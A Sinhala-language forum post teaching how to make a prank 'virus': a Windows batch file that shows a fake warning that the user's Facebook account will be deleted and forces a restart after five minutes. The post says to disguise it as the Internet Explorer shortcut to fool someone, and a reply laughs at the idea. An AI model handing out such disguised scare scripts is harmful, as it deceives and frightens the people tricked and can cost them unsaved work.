Virus එකක් හදමුද? My 60,000

Kalindugayan

Well-known member
  • Nov 8, 2007
    47,111
    1,140
    113
    34
    @ Elakiri.com
    මේක තමයි මම එළකිරි යේ දාන 60,000 වෙනි පොස්ට් එක. ඉතින් එක නිසා කට්ටියට කිසිම අනතුරක් නැති සිම්පල් වයිරස් එකක් හදන හැටි කියල දෙන්න හිතුන.

    1) මුලින්ම notepad එක Open කරගන්න.

    2) ඊළඟට මම මේ යටින් කියල තියෙන ටික notepad eke type කරන්න

    Quote
    @echo off
    msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!

    PAUSE
    shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."


    screen01n.jpg


    3) ඊට පස්සේ එක Internet Explorer.bat කියල save කරගන්න.

    screen02yy.jpg


    4) save කරගත්තු bat file eka right click karala create shortcut kiyana eka click karanna.

    screen03vt.jpg


    5) Right Click කරලා Properties යන්න.

    screen04i.jpg



    6) Icon එක මේ විදියට Change කරන්න.

    screen05j.jpg


    7) ඉන්ටෙර්නෙට් එකස්ප්ලෝරර් Icon එක ම තෝරාගන්න.

    screen06od.jpg


    8) දන ඉතින් ඔක්කොම හරි, කරන්න තියෙන්නේ ඇත්ත Internet Explorer shortcut eka delete කරලා මේ තියාගන්න එක. මේක උඩ ක්ලික් කරාම මේ වගේ දෙයක් ඔයාලටත් පෙන්නයි :rofl:

    screen08w.jpg


    screen09j.jpg


    දන්නේ නැති කෙනෙක් ට මේක පෙන්නුවොත් එහෙම රත් වෙයි, අයි ඉතින් මේකේ කියනවනේ තමන්ගේ Facebook account ekath delete කරනවා කියල. :lol::lol:

    විනාඩි 5 කින් computer eka restart වෙයි :shocked::shocked::shocked:

    එච්චර තමා :lol::lol::lol:
     

    Dharatha

    Well-known member
  • Dec 29, 2006
    14,688
    4,560
    113
    ado iyeth mama mokakda 1kak click karala ma magula yaka natuwa
    ela ela kawa hari tharaha gassana hoda system 1kak meka